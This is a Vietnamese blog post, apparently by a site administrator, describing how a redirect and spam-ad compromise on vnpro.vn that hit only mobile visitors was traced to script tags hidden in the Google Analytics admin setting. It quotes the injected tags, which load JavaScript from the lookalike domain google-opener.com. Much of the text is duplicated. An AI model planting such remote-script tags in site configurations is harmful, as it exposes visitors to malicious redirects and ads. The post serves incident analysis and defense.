Tweet
Hành trình Debugging: Giải mã bí ẩn lỗi Redirect Targeted Mobile Malware
Hôm nay mình xin chia sẻ lại một case sự cố bảo mật thú vị mà mình vừa xử lý xong trên website của công ty. Đây là một bài học thực tế rất giá trị về việc "Đừng tin hoàn toàn vào công cụ" và tư duy Debugging trong an ninh mạng.
1. Triệu chứng kỳ lạ (The Symptoms)
Sự cố bắt đầu khi có phản hồi rằng website vnpro.vn thỉnh thoảng bị chuyển hướng (redirect) sang các trang web lạ (softspace, trang spam...) hoặc hiển thị quảng cáo không mong muốn (hồ bơi, gấu bông...) ngay đầu trang.
Điều "đau đầu" nhất là:
Ban đầu, mình đã liên hệ Support Bluehost để quét virus. Kết quả trả về sau 2 tiếng quét hơn 240.000 file là: "0 Infected Files" (Sạch trơn). Mình cũng đã kiểm tra file .htaccess và source code index.php nhưng không tìm thấy đoạn mã chuyển hướng nào.
=> Bài học 1: Các công cụ quét virus (như ClamAV) thường chỉ phát hiện được virus dạng file (signature-based). Với các mã độc ẩn trong Database hoặc chèn script tinh vi, chúng thường bỏ sót (False Negative). 3. Manh mối và Bước ngoặt (The Breakthrough)
Không bỏ cuộc, mình quyết định thực hiện kỹ thuật Giả lập môi trường (Environment Spoofing) để tái hiện lỗi. Mình sử dụng tính năng "Developer Tools" trên trình duyệt Chrome, đổi User-Agent từ Desktop sang iPhone/Android.
🎯 Kết quả: Ngay lập tức, website hiển thị banner quảng cáo lạ và tự động chuyển hướng. => Kết luận: Đây là loại mã độc "Targeted Mobile Malware" (Mã độc nhắm mục tiêu di động). Nó dùng Javascript để kiểm tra thiết bị người dùng trước khi tấn công. 4. Truy tìm thủ phạm (Root Cause Analysis)
Nhờ phát hiện ra việc mã độc chèn banner quảng cáo vào giao diện (Frontend), mình khoanh vùng được rằng mã độc chắc chắn nằm ở khâu hiển thị (View).
Sau khi rà soát, "trùm cuối" đã lộ diện không phải trong file code, mà nằm ngay trong Cấu hình Admin (Database). Tại mục Cấu hình Google Analytics, hacker đã chèn lén đoạn code sau vào giữa mã GA thật của công ty:
Cách xử lý: Xóa bỏ toàn bộ đoạn script giả mạo trong trang Admin và xóa các mã Google Analytics lạ (G-KL...) bị chèn thêm. Website đã hoạt động bình thường ngay lập tức.
Bài học rút ra cho anh em Dev/Admin:
Hôm nay mình xin chia sẻ lại một case sự cố bảo mật thú vị mà mình vừa xử lý xong trên website của công ty. Đây là một bài học thực tế rất giá trị về việc "Đừng tin hoàn toàn vào công cụ" và tư duy Debugging trong an ninh mạng.
1. Triệu chứng kỳ lạ (The Symptoms)
Sự cố bắt đầu khi có phản hồi rằng website vnpro.vn thỉnh thoảng bị chuyển hướng (redirect) sang các trang web lạ (softspace, trang spam...) hoặc hiển thị quảng cáo không mong muốn (hồ bơi, gấu bông...) ngay đầu trang.
Điều "đau đầu" nhất là:
- Truy cập trên Máy tính/Laptop: Bình thường.
- Truy cập Trang Admin: Bình thường.
- Chỉ khi truy cập bằng Điện thoại (Mobile) hoặc một số IP lạ thì mới bị dính lỗi.
Ban đầu, mình đã liên hệ Support Bluehost để quét virus. Kết quả trả về sau 2 tiếng quét hơn 240.000 file là: "0 Infected Files" (Sạch trơn). Mình cũng đã kiểm tra file .htaccess và source code index.php nhưng không tìm thấy đoạn mã chuyển hướng nào.
=> Bài học 1: Các công cụ quét virus (như ClamAV) thường chỉ phát hiện được virus dạng file (signature-based). Với các mã độc ẩn trong Database hoặc chèn script tinh vi, chúng thường bỏ sót (False Negative). 3. Manh mối và Bước ngoặt (The Breakthrough)
Không bỏ cuộc, mình quyết định thực hiện kỹ thuật Giả lập môi trường (Environment Spoofing) để tái hiện lỗi. Mình sử dụng tính năng "Developer Tools" trên trình duyệt Chrome, đổi User-Agent từ Desktop sang iPhone/Android.
🎯 Kết quả: Ngay lập tức, website hiển thị banner quảng cáo lạ và tự động chuyển hướng. => Kết luận: Đây là loại mã độc "Targeted Mobile Malware" (Mã độc nhắm mục tiêu di động). Nó dùng Javascript để kiểm tra thiết bị người dùng trước khi tấn công. 4. Truy tìm thủ phạm (Root Cause Analysis)
Nhờ phát hiện ra việc mã độc chèn banner quảng cáo vào giao diện (Frontend), mình khoanh vùng được rằng mã độc chắc chắn nằm ở khâu hiển thị (View).
Sau khi rà soát, "trùm cuối" đã lộ diện không phải trong file code, mà nằm ngay trong Cấu hình Admin (Database). Tại mục Cấu hình Google Analytics, hacker đã chèn lén đoạn code sau vào giữa mã GA thật của công ty:
HTML Code:
<script async src="https://google-opener.com/authencation.js"></script> <script async src="https://google-opener.com/adsbygoogle.js"></script>
- Thủ đoạn: Hacker sử dụng domain giả mạo google-opener.com (nhìn thoáng qua rất giống của Google) để đánh lừa admin.
- Hành vi: File adsbygoogle.js chịu trách nhiệm chèn quảng cáo rác, còn authencation.js (cố tình viết sai chính tả) chứa lệnh Redirect người dùng mobile.
Cách xử lý: Xóa bỏ toàn bộ đoạn script giả mạo trong trang Admin và xóa các mã Google Analytics lạ (G-KL...) bị chèn thêm. Website đã hoạt động bình thường ngay lập tức.
Bài học rút ra cho anh em Dev/Admin:
- Validate Input: Luôn kiểm tra kỹ các ô nhập liệu cấu hình (Script Header/Body/Analytics). Đây là nơi hacker rất thích "giấu đồ".
- User-Agent Debugging: Khi gặp lỗi "lúc bị lúc không", hãy nghĩ ngay đến việc lỗi phân biệt thiết bị (PC vs Mobile).
- Soi kỹ tên miền: Đừng để các domain "nhái" như google-opener, facbook-cdn... qua mặt.